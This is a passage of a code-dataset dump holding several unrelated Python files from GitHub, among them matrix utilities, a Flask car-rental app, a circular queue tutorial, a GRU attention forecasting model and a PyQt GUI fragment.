len(matrix2), len(matrix2[0])\n\n if cols1 != rows2:\n raise ValueError(\"Las dimensiones de las matrices no son compatibles para la multiplicación.\")\n\n result = [[0 for _ in range(cols2)] for _ in range(rows1)]\n\n for i in range(rows1):\n for j in range(cols2):\n for k in range(cols1):\n result[i][j] += matrix1[i][k] * matrix2[k][j]\n\n return result\n\ndef gauss_jordan(matrix):\n n = len(matrix)\n augmented_matrix = [row + [1 if i == j else 0 for j in range(n)] for i, row in enumerate(matrix)]\n\n for col in range(n):\n pivot_row = max(range(col, n), key=lambda i: abs(augmented_matrix[i][col]))\n augmented_matrix[col], augmented_matrix[pivot_row] = augmented_matrix[pivot_row], augmented_matrix[col]\n\n pivot_val = augmented_matrix[col][col]\n if pivot_val == 0:\n raise ValueError(\"La matriz no se puede invertir.\")\n\n for j in range(col, 2 * n):\n augmented_matrix[col][j] /= pivot_val\n\n for i in range(n):\n if i == col:\n continue\n factor = augmented_matrix[i][col]\n for j in range(col, 2 * n):\n augmented_matrix[i][j] -= factor * augmented_matrix[col][j]\n\n inverse_matrix = [row[n:] for row in augmented_matrix]\n return inverse_matrix\n\ndef cross_product(vector1, vector2):\n if len(vector1) != 3 or len(vector2) != 3:\n raise ValueError(\"Los vectores deben tener longitud 3 para calcular el producto vectorial.\")\n\n result = [\n vector1[1] * vector2[2] - vector1[2] * vector2[1],\n vector1[2] * vector2[0] - vector1[0] * vector2[2],\n vector1[0] * vector2[1] - vector1[1] * vector2[0]\n ]\n return result\n\ndef matrix_transpose(matrix):\n return [[matrix[j][i] for j in range(len(matrix))] for i in range(len(matrix[0]))]\n\ndef solve_linear_system(coeff_matrix, const_vector):\n n = len(coeff_matrix)\n\n # Transformar la matriz aumentada [coeff_matrix | const_vector]\n augmented_matrix = [coeff_matrix[i] + [const_vector[i]] for i in range(n)]\n\n # Eliminación gaussiana\n for col in range(n):\n if augmented_matrix[col][col] == 0:\n raise ValueError(\"El sistema no tiene solución única.\")\n\n for row in range(col + 1, n):\n factor = augmented_matrix[row][col] / augmented_matrix[col][col]\n for j in range(col, n + 1):\n augmented_matrix[row][j] -= factor * augmented_matrix[col][j]\n\n # Sustitución hacia atrás para encontrar las soluciones\n solutions = [0] * n\n for i in range(n - 1, -1, -1):\n if augmented_matrix[i][i] == 0:\n raise ValueError(\"El sistema no tiene solución única.\")\n\n solutions[i] = augmented_matrix[i][n] / augmented_matrix[i][i]\n for j in range(i):\n augmented_matrix[j][n] -= augmented_matrix[j][i] * solutions[i]\n\n return solutions\n\ndef matrix_determinant(matrix):\n n = len(matrix)\n\n if n == 1:\n return matrix[0][0]\n\n determinant = 0\n for i in range(n):\n submatrix = [row[:i] + row[i + 1:] for row in matrix[1:]]\n sign = (-1) ** i\n determinant += sign * matrix[0][i] * matrix_determinant(submatrix)\n\n return determinant\n \n ","repo_name":"R4fael-99/Tareas-Y-Proyectos","sub_path":"matrix_m2.py","file_name":"matrix_m2.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10563687380","text":"from funciones import *\n\nclearConsole()\nprint(\"\\n ******************* \")\nfile_name = str(input(\"Ingrese el nombre del archivo: \"))\nclearConsole()\n\nwhile True:\n print(\"\\n ******************* \")\n dni = str(input(\"Ingrese el DNI del usuario: \"))\n\n if dni.isnumeric() and (len(dni) == 7 or len(dni) == 8):\n clearConsole()\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Por favor, ingresa de nuevo \\nEl DNI debe tener entre 7 y 8 caracteres')\n\nprint(\"\\n ******************* \")\nwhile True:\n choose = int(input(\"Tipos de cheque: \\n1. Emitido\\n2. Depositado\\nSeleccione el tipo de cheque: \"))\n if choose == 1:\n check_type = \"EMITIDO\"\n break\n elif choose == 2:\n check_type = \"DEPOSITADO\"\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Elija la opcion correspondiente')\n print(\"\\n ******************* \")\n\nclearConsole()\nprint(\"\\n ******************* \")\ncheck_state_input = True if str(input(\"¿Desea selecionar un estado de cheque? S/N \")).upper() == \"S\" else False\nclearConsole()\nwhile True:\n if check_state_input:\n choose = int(input(\"Estados de cheque: \\n1. Pendiente\\n2. Aprobado\\n3. Rechazado\\nSeleccione un estado de cheque: \"))\n if choose == 1:\n check_state = 'PENDIENTE'\n clearConsole()\n break\n elif choose == 2:\n check_state = 'APROBADO'\n clearConsole()\n break\n elif choose == 3: \n check_state = 'RECHAZADO'\n clearConsole()\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Elija la opcion correspondiente')\n print(\"\\n ******************* \")\n\n else:\n check_state = ''\n break\n\n\nprint(\"\\n ******************* \")\ncheck_date_input = True if str(input(\"¿Desea seleccionar un rango de fecha? S/N \")).upper() == \"S\" else False\nclearConsole()\nif check_date_input:\n print(\"\\n ******************* \")\n check_date = str(input(\"Seleccione un rango de fecha\\n ******************* \\ndd-mm-aaaa:dd-mm-aaaa: \"))\n clearConsole()\nelse:\n check_date = ''\n\n\nprint(\"\\n ******************* \")\nwhile True:\n output_type = int(input(\"Tipos de salida: \\n1. Pantalla\\n2. CSV\\nSeleccione un tipo de salida: \"))\n if output_type == 1 or output_type == 2:\n clearConsole()\n break\n else:\n clearConsole()\n print(\"\\n ******************* \")\n print('Elija la opcion correspondiente')\n print(\"\\n ******************* \")\n\ndicc = csvToDicc(file_name)\ndicc_dni = diccFilter(dicc, 'DNI', dni)\ndicc_dni_type = diccFilter(dicc_dni, 'Tipo', check_type)\ndiccExist = dicc_dni_type #variable actualizada con los dicc filtrados existentes.\n\nif check_state:\n diccExist = diccFilter(diccExist, 'Estado', check_state)\n \n\n\nif check_type == \"EMITIDO\":\n if check_date:\n diccExist = time(diccExist, 'FechaOrigen', check_date)\n error = error(dicc_dni, 'NroCheque', 'NumeroCuentaOrigen')\nelif check_type == \"DEPOSITADO\":\n if check_date:\n diccExist = time(diccExist, 'FechaPago', check_date)\n error = error(dicc_dni, 'NroCheque', 'NumeroCuentaDestino')\n\nclearConsole()\nif error:\n print('Error: cheque duplicado en la cuenta\\nNo es posible visualizar datos.')\nelse:\n print(\"\\n ******************* \")\n print(\" Resultados \")\n print(\"\\n ******************* \")\n if output_type == 1:\n for key in diccExist:\n print(key, ' = ', diccExist[key])\n elif output_type == 2:\n name = getCsvName(diccExist, 'DNI')\n trimedDic = trimDic(diccExist, ['NroCheque', 'CodigoBanco', 'CodigoScurusal', 'DNI', 'Tipo', 'Estado'])\n diccToCsv(trimedDic, name)\n","repo_name":"pililongo/Homebanking_ITBA","sub_path":"Backend/Sprint_4/listado_cheques.py","file_name":"listado_cheques.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30738300113","text":"\"\"\"\nprogram for insertion and deletion in circular queue\n\nFront:Get the front item from queue.\nRear: Get the last item from queue.\nenqueue(value): This function is used to insert an element into the circular queue. \nIn a circular queue, the new element is always inserted at Rear position.\n\nSteps:\n\nCreate a new node dynamically and insert value into it.\nCheck if front==NULL, if it is true then front = rear = (newly created node)\nIf it is false then rear=(newly created node) and rear node always contains the address\nof the front node.\ndequeue(): This function is used to delete an element from the circular queue. \nIn a queue, the element is always deleted from front position.\n\nSteps:\n1)Check whether queue is empty or not means front == NULL.\n2)If it is empty then display Queue is empty.If queue is not empty then step 3\n3)Check if (front==rear) if it is true then set front = rear = NULL else move the front \nforward in queue, update address of front in rear node and return the element.\n\nTime Complexity: Time complexity of enQueue(), deQueue() operation is O(1) as there is \nno loop in any of the operation. \n\nIn case of linked list implementation, a queue can be easily implemented without \nbeing circular. However, in the case of array implementation, we need a circular queue \nto save space. \n\n\"\"\"\n\n# Node Structure\nclass Node:\n def __init__(self):\n self.data =None\n self.link =None\n\nclass Queue:\n def __init__(self):\n front =None\n rear =None\n\n# Function to create Circular Queue\ndef enqueue(q, value):\n temp =Node()\n temp.data =value\n\n if(q.front == None):\n q.front = temp\n else:\n q.rear.link =temp\n\n q.rear =temp\n q.rear.link =q.front\n\n# Function to delete element from circular queue\ndef dequeue(q):\n if(q.front == None):\n print(\"Queue is empty\")\n return -999999999999\n\n # if this is the last node to be deleted\n value =None # Value to be dequeued\n if(q.front == q.rear):\n value = q.front.data\n q.front = None\n q.rear = None\n else: # There are more than one nodes\n temp =q.front\n value =temp.data\n q.front =q.front.link\n q.rear.link =q.front\n return value\n\n# Function displaying the elements of circular queue\ndef display_queue(q):\n temp = q.front\n print(\"Elements in Circular Queue are:\", end =\" \")\n while(temp.link != q.front):\n print(temp.data, end=\" \")\n temp =temp.link\n print(temp.data)\n\nif __name__=='__main__':\n # Create a queue and initialize front and rear\n q =Queue()\n q.front = q.rear = None\n\n # Inserting elements in Circular Queue\n enqueue(q, 14)\n enqueue(q, 22)\n enqueue(q, 6)\n\n # Display elements present in Circular Queue\n display_queue(q)\n\n # Deleting elements from Circular Queue\n print(\"Deleted value =\", dequeue(q))\n print(\"Deleted value =\", dequeue(q))\n\n # Remaining elements in Circular Queue\n display_queue(q)\n\n enqueue(q, 9)\n enqueue(q, 20)\n display_queue(q)\n\n\n\n","repo_name":"Chemokoren/Algorithms-1","sub_path":"GFG/LinkedLists/CircularLinkedLists/circular_ll_implementation.py","file_name":"circular_ll_implementation.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"24187746454","text":"def print_phonebook():\n with open('Phonebook.csv', 'r', encoding=\"UTF-8\") as f:\n phonebook = f.read().replace(\",\", \" \")\n print(phonebook)\n\ndef search():\n with open('Phonebook.csv', 'r', encoding=\"UTF-8\") as f:\n phonebook = f.read().split()[1:]\n text = input(\"Введите, что вы хотите найти: \")\n for line in phonebook:\n if text in line:\n print(line.replace(\",\", \" \"))\n flag = True\n if not flag:\n print(\"Такой записи не найдено\")\n\n","repo_name":"DanilVis/Course_Python","sub_path":"PythonCourse/Seminar7/Homework_7_Phone_book/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15685883258","text":"import torch.nn as nn\nimport random\nimport torch\nimport torch.nn.functional as F\nimport sys\nfrom layers.Embed import DataEmbedding\n\nclass Encoder(nn.Module):\n def __init__(self, enc_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout):\n super().__init__()\n \n self.embedding = DataEmbedding(enc_in, emb_dim, embed, freq, dropout)\n self.rnn = nn.GRU(emb_dim, enc_hid_dim, bidirectional = True, batch_first=True)\n self.fc = nn.Linear(enc_hid_dim * 2, dec_hid_dim)\n \n def forward(self, x_enc, x_mark_enc):\n \n #x_enc = [x_enc len, batch size]\n \n embedded = self.embedding(x_enc, x_mark_enc)\n #embedded = [x_enc len, batch size, emb dim]\n \n outputs, hidden = self.rnn(embedded)\n \n #outputs = [x_enc len, batch size, hid dim * num directions]\n #hidden = [n layers * num directions, batch size, hid dim]\n \n #hidden is stacked [forward_1, backward_1, forward_2, backward_2, ...]\n #outputs are always from the last layer\n \n #hidden [-2, :, : ] is the last of the forwards RNN \n #hidden [-1, :, : ] is the last of the backwards RNN\n \n #initial decoder hidden is final hidden state of the forwards and backwards \n # encoder RNNs fed through a linear layer\n hidden = torch.tanh(self.fc(torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)))\n \n #outputs = [x_enc len, batch size, enc hid dim * 2]\n #hidden = [batch size, dec hid dim]\n \n return outputs, hidden\n\n\n\nclass Attention(nn.Module):\n def __init__(self, enc_hid_dim, dec_hid_dim):\n super().__init__()\n \n self.attn = nn.Linear((enc_hid_dim * 2) + dec_hid_dim, dec_hid_dim)\n self.v = nn.Linear(dec_hid_dim, 1, bias = False)\n \n def forward(self, hidden, encoder_outputs):\n \n #hidden = [batch size, dec hid dim]\n #encoder_outputs = [batch size, x_enc len, enc hid dim * 2]\n \n batch_size, x_enc_len = encoder_outputs.shape[0], encoder_outputs.shape[1]\n \n #repeat decoder hidden state x_enc_len times\n hidden = hidden.unsqueeze(1).repeat(1, x_enc_len, 1)\n \n #hidden = [batch size, x_enc len, dec hid dim]\n \n energy = torch.tanh(self.attn(torch.cat((hidden, encoder_outputs), dim = 2))) \n \n #energy = [batch size, x_enc len, dec hid dim]\n\n attention = self.v(energy).squeeze(2)\n \n #attention= [batch size, x_enc len]\n \n return F.softmax(attention, dim=1)\n\n\nclass Decoder(nn.Module):\n def __init__(self, dec_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout, attention):\n super().__init__()\n\n self.attention = attention\n \n self.embedding = DataEmbedding(dec_in, emb_dim, embed, freq, dropout)\n \n self.rnn = nn.GRU((enc_hid_dim * 2) + emb_dim, dec_hid_dim, batch_first=True)\n \n self.fc_out = nn.Linear((enc_hid_dim * 2) + dec_hid_dim + emb_dim, dec_in)\n \n def forward(self, input, input_mark, hidden, encoder_outputs):\n \n #hidden = [batch size, dec hid dim]\n #encoder_outputs = [batch size, x_enc len, enc hid dim * 2]\n \n #input = [1, batch size]\n \n embedded = self.embedding(input, input_mark)\n \n #embedded = [batch size, 1, emb dim]\n \n a = self.attention(hidden, encoder_outputs)\n \n #a = [batch size, x_enc len]\n \n a = a.unsqueeze(1)\n \n #a = [batch size, 1, x_enc len]\n \n weighted = torch.bmm(a, encoder_outputs)\n \n #weighted = [batch size, 1, enc hid dim * 2]\n \n rnn_input = torch.cat((embedded, weighted), dim = 2)\n \n #rnn_input = [batch size, 1, (enc hid dim * 2) + emb dim]\n \n output, hidden = self.rnn(rnn_input, hidden.unsqueeze(0))\n \n #output = [seq len, batch size, dec hid dim * n directions]\n #hidden = [n layers * n directions, batch size, dec hid dim]\n \n #seq len, n layers and n directions will always be 1 in this decoder, therefore:\n #output = [batch size, 1, dec hid dim]\n #hidden = [1, batch size, dec hid dim]\n #this also means that output == hidden\n assert (output == hidden.transpose(1, 0)).all()\n prediction = self.fc_out(torch.cat((output, weighted, embedded), dim = 2))\n \n #prediction = [batch size, seq_len, output dim]\n return prediction, hidden.squeeze(0)\n\nclass GruAttention(nn.Module):\n def __init__(self, args):\n super().__init__()\n enc_in, dec_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout = \\\n args.enc_in, args.dec_in, args.d_model, args.d_model, args.d_model, args.embed, \\\n args.freq, args.dropout\n self.pred_len = args.pred_len\n self.teacher_forcing_ratio = args.teacher_forcing_ratio\n \n attention = Attention(enc_hid_dim, dec_hid_dim)\n self.encoder = Encoder(enc_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout)\n self.decoder = Decoder(dec_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout, attention)\n \n def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec):\n \n #x_enc = [x_enc len, batch size, n_features]\n #x_dec = [x_dec len, batch size, n_features]\n #teacher_forcing_ratio is probability to use teacher forcing\n #e.g. if teacher_forcing_ratio is 0.75 we use ground-truth inputs 75% of the time\n if self.training:\n teacher_forcing_ratio = self.teacher_forcing_ratio\n else:\n teacher_forcing_ratio = 0\n batch_size, x_dec_len, dec_in = x_dec.shape\n #tensor to store decoder outputs\n outputs = torch.zeros(batch_size, x_dec_len-1, dec_in).to(x_enc.device)\n \n #last hidden state of the encoder is the context\n encoder_outputs, hidden = self.encoder(x_enc, x_mark_enc)\n \n input = x_dec[:, 0, :].unsqueeze(dim=1)\n input_mark = x_mark_dec[:, 0, :].unsqueeze(dim=1)\n for t in range(1, x_dec_len):\n #insert input token embedding, previous hidden state and the context state\n #receive output tensor (predictions) and new hidden state\n output, hidden = self.decoder(input, input_mark, hidden, encoder_outputs)\n \n #place predictions in a tensor holding predictions for each token\n outputs[:, t-1, :] = output.squeeze(dim=1)\n \n #decide if we are going to use teacher forcing or not\n teacher_force = random.random() < teacher_forcing_ratio\n \n #if teacher forcing, use actual next token as next input\n input = x_dec[:, t, :].unsqueeze(dim=1) if teacher_force else output\n input_mark = x_mark_dec[:, t, :].unsqueeze(dim=1)\n\n return outputs[:, -self.pred_len:, :]\n \nif __name__ == '__main__':\n enc_in, dec_in, emb_dim, enc_hid_dim, dec_hid_dim = 45, 45, 512, 512, 512\n batch_size, seq_len = 32, 10\n x = torch.randn(batch_size, seq_len, enc_in)\n model1 = Encoder(enc_in, emb_dim, enc_hid_dim, dec_hid_dim, 0.2)\n # hidden, cell = model1(x)\n atten = Attention(enc_hid_dim, dec_hid_dim)\n model2 = Decoder(dec_in, emb_dim, enc_hid_dim, dec_hid_dim, 0.2,atten)\n # model2(x, hidden, cell)\n y = torch.randn(batch_size, 10, dec_in)\n model = GruAttention(model1, model2, torch.device(\"cuda\"))\n output = model(x, y)\n print(\"\")","repo_name":"hyliush/deep-time-series","sub_path":"models/seq2seq/EDGruAttention.py","file_name":"EDGruAttention.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"38"} +{"seq_id":"37983626815","text":"import numpy as np\nimport os\nfrom pdb import set_trace as st\nimport matplotlib.pyplot as plt\n\n\n# Paths to segmented track file\npath_folder1 = r'Z:\\Data\\synchronised_imu_kinect_frames_no_interpolation'\npath_folder2 = r'Z:\\Data\\synchronised_imu_kinect_frames'\n\n# path1 = r'Z:\\Data\\synchronised_imu_kinect_frames_no_interpolation\\20230522_165057 - 015 - KinectDataFrames.npy'\n# path2 = r'Z:\\Data\\synchronised_imu_kinect_frames\\20230519_170143 - 015 - KinectDataFrames.npy'\n\n# List all Kinect frame files\nlist1 = os.listdir(path_folder1)\nlist2 = os.listdir(path_folder2)\nlist1 = [e for e in list1 if ' - KinectDataFrames.npy' in e]\nlist2 = [e for e in list2 if ' - KinectDataFrames.npy' in e]\n\n# Loop on the listed data files\nfor file_idx in range(len(list1)):\n # Get current file\n file1 = list1[file_idx]\n # Extract subject idx\n pos = file1.find(' - KinectDataFrames.npy')\n subject_idx = file1[pos-3:pos]\n print('Checking Kinect tracks of subject %s' % (subject_idx))\n # Get corresponding file in the second folder\n corr_file = [e for e in list2 if subject_idx+' - KinectDataFrames.npy' in e]\n file2 = corr_file[0]\n # Load data frames\n f1 = np.load(os.path.join(path_folder1,file1))\n f2 = np.load(os.path.join(path_folder2,file2))\n\n # Look for differences in frames between f1 and f2\n for idx in range(len(f1)):\n tmp1 = f1[idx]\n tmp2 = f2[idx]\n if not (tmp1==tmp2).all():\n print(' Differences in frame %d/%d' % (idx+1,len(f1)))\n diff = tmp1-tmp2\n for column_idx in range(diff.shape[1]):\n # plot the two tracks\n if np.sum(diff[:,column_idx]) != 0:\n plt.subplot(2,1,1)\n plt.plot(tmp1[:,column_idx],color='b')\n plt.subplot(2,1,2)\n plt.plot(tmp2[:,column_idx],color='r')\n plt.show()\n","repo_name":"Frederic-Li-Hanchen/ScreenFM-test-scripts","sub_path":"plotting_scripts/plot_tracks.py","file_name":"plot_tracks.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"535017684","text":"\"\"\"\r\nRoutes and views for the flask application.\r\n\"\"\"\r\n\r\nfrom datetime import datetime\r\nfrom flask import render_template,request, session\r\nfrom car_rent import app\r\n\r\nimport requests\r\nimport json\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n \"\"\"Renders the home page.\"\"\"\r\n return \"Home\"\r\n\r\n\r\n@app.route('/register', methods=['POST'])\r\ndef register():\r\n \"\"\"register user in the system\r\n\r\n receive user input in post request, transfer request in json format to API cloud restful interface\r\n then get response from API cloud and render template page register.html\r\n\r\n Returns:\r\n rendered template register.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n r = requests.post(url=app.config['CLOUD_API_URL']+\"add_user\", headers=headers, json=request.form)\r\n \r\n result = json.loads(r.content)\r\n return render_template('register.html',result = result)\r\n\r\n\r\n@app.route('/login', methods=['POST'])\r\ndef login():\r\n \"\"\"login user into the system\r\n\r\n receive username and password from post parameters. send back to API cloud to validate.\r\n fail to verify, response front end with result message.\r\n succeed to verify, save username in session object for future usage and response with\r\n rendered index.html\r\n\r\n Returns:\r\n rendered template index.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n r = requests.post(url=app.config['CLOUD_API_URL']+\"login_user\", headers=headers, json=request.form)\r\n result = json.loads(r.content)\r\n \r\n if (result[\"status\"]!=0):\r\n return result['message']\r\n \r\n session['username'] = result['username']\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/list_available_cars', methods=['GET'])\r\ndef list_available_cars(): \r\n \"\"\"list available cars in the system\r\n\r\n request api back end for all the available cars. API service response with information\r\n in json format\r\n render template list_available_cars.html with data\r\n\r\n Returns:\r\n rendered template list_available_cars.html\r\n \"\"\"\r\n\r\n #headers = {'Content-Type': 'application/json'} \r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"list_available_cars\")\r\n result = json.loads(r.content)\r\n return render_template('list_available_cars.html',data_list=result['data'])\r\n\r\n\r\n@app.route('/search_cars', methods=['POST'])\r\ndef search_cars(): \r\n \"\"\"search cars\r\n\r\n receive search parameters from post. send back to API cloud to search\r\n fail to verify, response front end with result message.\r\n succeed to verify, save username in session object for future usage and response with\r\n rendered index.html\r\n\r\n Returns:\r\n rendered template search_cars.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"search_cars\",headers=headers, json=request.form )\r\n result = json.loads(r.content)\r\n return render_template('search_cars.html',data_list=result['data'])\r\n\r\n\r\n@app.route('/book_a_car', methods=['POST'])\r\ndef book_a_car():\r\n \"\"\"book a car\r\n\r\n receive booking parameters from post. send back to API cloud to book, \r\n response front end with result message.\r\n rendered book_a_car.html\r\n\r\n Returns:\r\n rendered template book_a_car.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n params ={\"username\":session['username'], \"carid\":request.form['carid'],\"pickup_ts\":request.form['pickup_ts']}\r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"book_a_car\", headers=headers, json = json.dumps(params))\r\n result = json.loads(r.content)\r\n return render_template('book_a_car.html',result=result)\r\n\r\n\r\n@app.route('/cancel_a_book', methods=['POST'])\r\ndef cancel_a_book(): \r\n \"\"\"cancel a car booking\r\n\r\n Cancel a booking. send back post parameters to API cloud.\r\n response front end with result message.\r\n rendered book_a_car.html\r\n\r\n Returns:\r\n rendered template book_a_car.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n params ={\"username\":session['username'], \"rent_id\":request.form['rent_id']}\r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"cancel_a_book\", headers=headers, json = json.dumps(params))\r\n result = json.loads(r.content)\r\n return render_template('cancel_a_book.html',message=result['message'])\r\n\r\n\r\n@app.route('/list_rent_history', methods=['GET'])\r\ndef list_rent_history():\r\n \"\"\"list user's rent history\r\n\r\n Call API cloud service to retrieve use rent history.\r\n response front end with result message in list_rent_history.html\r\n\r\n Returns:\r\n rendered template list_rent_history.html\r\n \"\"\"\r\n #headers = {'Content-Type': 'application/json'} \r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"list_rent_history/\"+session['username'])\r\n result = json.loads(r.content)\r\n return render_template('list_rent_history.html',data_list=result['data'])\r\n\r\n\r\n@app.route('/logout', methods=['GET'])\r\ndef logout():\r\n \"\"\"logout user \r\n\r\n clear up use session information\r\n\r\n Returns:\r\n rendered template logout.html\r\n \"\"\"\r\n\r\n # remove the username from the session if it's there\r\n session.pop('username', None)\r\n return render_template('logout.html')\r\n\r\n\r\n@app.route('/test', methods=['GET'])\r\ndef test():\r\n return app.config['CLOUD_API_URL']\r\n","repo_name":"s3638151/IOT2","sub_path":"car_rent/car_rent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28072375455","text":"# Extract prediction from valPredictions file\n# original: 'gqa3_horovod_original_512x32x4_gadasum_lr1.56e-6_q1_or_pc100_b16'\n# hybrid: 'gqa3_horovod_hybrid_512x32x4_gadasum_lr1.56e-6_q1_hb_un_pc020_b16'\n# logic:\n# 'gqa3_horovod_hybrid_E4_512x32x4_fw_tflSS_l1.0_w1e-1_gadasum_lr1.56e-6_q1_hb_un_pc020_b16'\nimport argparse\nimport json\n\ndef extract_preds(expname):\n with open('./{exp}/valPredictions-{exp}.json'.format(exp=expname),'r') as json_fh:\n predictions = json.load(json_fh)\n return {p['questionId']:p['prediction'] for p in predictions}\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--infile', default='',\n type=str, help='path to valPredictions.json file')\n parser.add_argument('-o', '--outfile', default='',\n type=str, help='path to valPredicts.json file')\n args = parser.parse_args()\n preds_dict = extract_preds(args.infile)\n with open(args.outfile,'w') as json_fh:\n json.dump(preds_dict,json_fh)\n\nif __name__ == '__main__':\n main()\n","repo_name":"lengoanhcat/consistent_gqa","sub_path":"preds_postprocess/extract_preds.py","file_name":"extract_preds.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12562319817","text":"def pm():\n N=int(input())\n while N<3 or N%2==1:\n print(\"error\")\n N = int(input())\n pme=set()\n for i in range(2,N+1):\n pme.add(i)\n for i in range(2,N+1):\n if i in pme:\n for k in range(2*i,N+1,i):\n if k in pme:\n pme.remove(k)\n for e in pme:\n f=N-e\n if f>=e and f in pme:\n print(N,\"=\",e,\"+\",f)\npm()","repo_name":"czy0538/Python_learning","sub_path":"2019小学期/考试之前/22验证歌德巴赫猜想.py","file_name":"22验证歌德巴赫猜想.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26381637832","text":"import re\nimport sys\nfrom sklearn.ensemble import RandomForestClassifier\nimport random\n\nfrom skimage import measure\nimport cv2\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtCore import pyqtSlot, Qt, QThread, pyqtSignal\nimport matplotlib as mpl\nimport matplotlib.style as mplStyle\n\nfrom scipy.interpolate import griddata\n\nfrom CSw_sjk import Ui_MainWindow\n\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow,\n QSplitter, QColorDialog, QLabel, QComboBox, QTreeWidgetItem, QProgressDialog,\n QTableWidgetItem, QMessageBox)\nfrom PyQt5.QtCore import pyqtSlot, QDir, QIODevice, QFile, QTextStream\nfrom PyQt5.QtWidgets import QFileDialog\nfrom myfigure import QmyFigure\n\nimport numpy as np\nimport CSw_dcfbx_Slot\n\nCJX = {}\nBHD = {}\nKXD = {}\nSTL = {}\n\nDJDZSJ = {}\nXSPMSJ = []\nSKSJ = []\nCSSJ = []\nCJDYSJ = {}\nZSJS = []\nXSQX = []\nCYJS = []\nDS = []\nCJDYZB = {}\n\n\n\nclass QmyMainWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent) # 调用父类构造函数,创建窗体\n self.ui = Ui_MainWindow() # 创建UI对象\n self.ui.setupUi(self) # 构造UI界面\n\n self.stepx = 50\n self.stepy = 50\n self.qlqFloor = [] #潜力区所有需要筛选层的层名\n self.qlqBinary = {}\n self.qlqXb = {}\n self.qlqYb = {}\n self.qlqContours = {}\n self.qlqTable = {}\n self.qlqTableList = []\n\n # 展开节点\n self.ui.treeWidget.topLevelItem(0).setExpanded(True)\n self.ui.treeWidget.topLevelItem(1).setExpanded(True)\n # self.ui.treeWidget.setAlternatingRowColors(True)\n self.ui.treeWidget.clicked.connect(self.on_treeWidget_clicked)\n self.ui.treeWidget.topLevelItem(0).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(0).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(1).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(2).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(3).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(4).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(0).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(1).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(2).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(3).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(4).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(5).setIcon(0, QtGui.QIcon('images/122.bmp'))\n\n self.setWindowState(Qt.WindowMaximized) # 窗口最大化显示\n # self.ui.tabWidget.setVisible(False) # 隐藏\n self.ui.tabWidget.clear() # 清除所有页面\n self.ui.tabWidget.setTabsClosable(True) # Page有关闭按钮\n\n\n mplStyle.use(\"classic\") # 使用样式,必须在绘图之前调用,修改字体后才可显示汉字\n mpl.rcParams['font.sans-serif'] = ['KaiTi', 'SimHei'] # 显示汉字为 楷体, 汉字不支持 粗体,斜体等设置\n mpl.rcParams['font.size'] = 12\n ## Windows自带的一些字体\n ## 黑体:SimHei 宋体:SimSun 